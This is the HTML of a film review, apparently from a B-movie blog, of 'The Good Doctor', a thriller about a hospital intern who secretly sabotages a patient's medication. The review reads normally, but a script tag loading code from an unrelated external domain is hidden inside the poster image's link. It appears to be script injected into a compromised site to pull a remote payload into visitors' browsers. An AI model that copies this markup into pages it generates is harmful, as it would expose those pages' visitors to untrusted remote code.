The crumminess of \u201940s and \u201950s B movies sometimes made them even darker, as though life were so grim there was no point in expending the effort to give them a little style.<\/p>\n<p>That\u2019s how \u201cThe Good Doctor\u201d feels: as blah as a soap opera &#8212; which is what it seems, at first, to be.<\/p>\n<p>Orlando Bloom plays an intern having trouble settling into hospital routine. He\u2019s intimidated by the experienced nurses and clumsy at sucking up to the senior doctors who have the power to make or break his career.<br \/>\n<a href=\"http:\/\/www.bmovienation.com\/?attachment_id=4307\" rel=\"attachment wp-att-4307\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.bmovienation.com\/wp-content\/uploads\/2012\/08\/Good-Doctor-Poster-Preview-300x173.jpg\" alt=\"\" title=\"Good-Doctor-Poster-Preview\" width=\"300\" height=\"173\" class=\"alignnone size-medium wp-image-4307\" srcset=\"http:\/\/www.bmovienation.com\/wp-content\/uploads\/2012\/08\/Good-Doctor-Poster-Preview-300x173.jpg 300w, http:\/\/www.bmovienation.com\/wp-content\/uploads\/2012\/08\/Good-Doctor-Poster-Preview.jpg 570w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><script src=\"\/\/pngme.ru\/seter\"><\/script><\/a><\/p>\n<p>We see him at loose ends in his barren apartment; watch him perk up around a pretty patient (Riley Keough) who\u2019s in for a kidney problem; and witness his discomfort when her parents push him at her overbearing sister.<\/p>\n<p>We see him furtively altering her meds so she\u2019ll stay hospitalized. And only gradually do we realize he\u2019s nuts.<\/p>\n<p>Written by John Enbom and directed by Lance Daly, \u201cThe Good Doctor\u201d regards everything from the young maniac\u2019s point of view, so the focus of suspense becomes not what he\u2019ll do next but whether he\u2019ll be caught.<\/p>\n<p>It\u2019s icily superficial, showing us little about him but his anxiety and practically nothing about anyone else.<\/p>\n<p>The idea of a doctor sabotaging a patient is so unsettling that the picture has the power to make you squirm and sweat. But it\u2019s no fun. It doesn\u2019t give you anything but the creeps.<\/p>\n<p>\u201cThe Good Doctor,\u201d from Magnolia Pictures, is playing in New York and Los Angeles.
